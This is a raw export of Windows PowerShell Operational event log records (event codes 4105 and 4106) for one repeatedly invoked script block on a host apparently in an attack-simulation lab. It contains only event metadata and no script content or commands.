RecordNumber=1471775
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471774
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471773
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471772
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471771
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471770
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471769
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471768
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471767
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471766
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471765
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471764
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471763
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471762
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471761
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471760
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471759
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471758
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471757
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471756
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471755
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471754
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471753
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471752
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471751
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471750
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471749
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471748
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471747
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471746
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471745
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471744
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471743
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471742
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471741
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471740
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471739
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471738
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471737
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471736
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471735
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471734
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471733
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471732
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471731
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471730
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471729
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471728
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471727
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471726
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471725
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471724
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471723
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471722
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471721
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
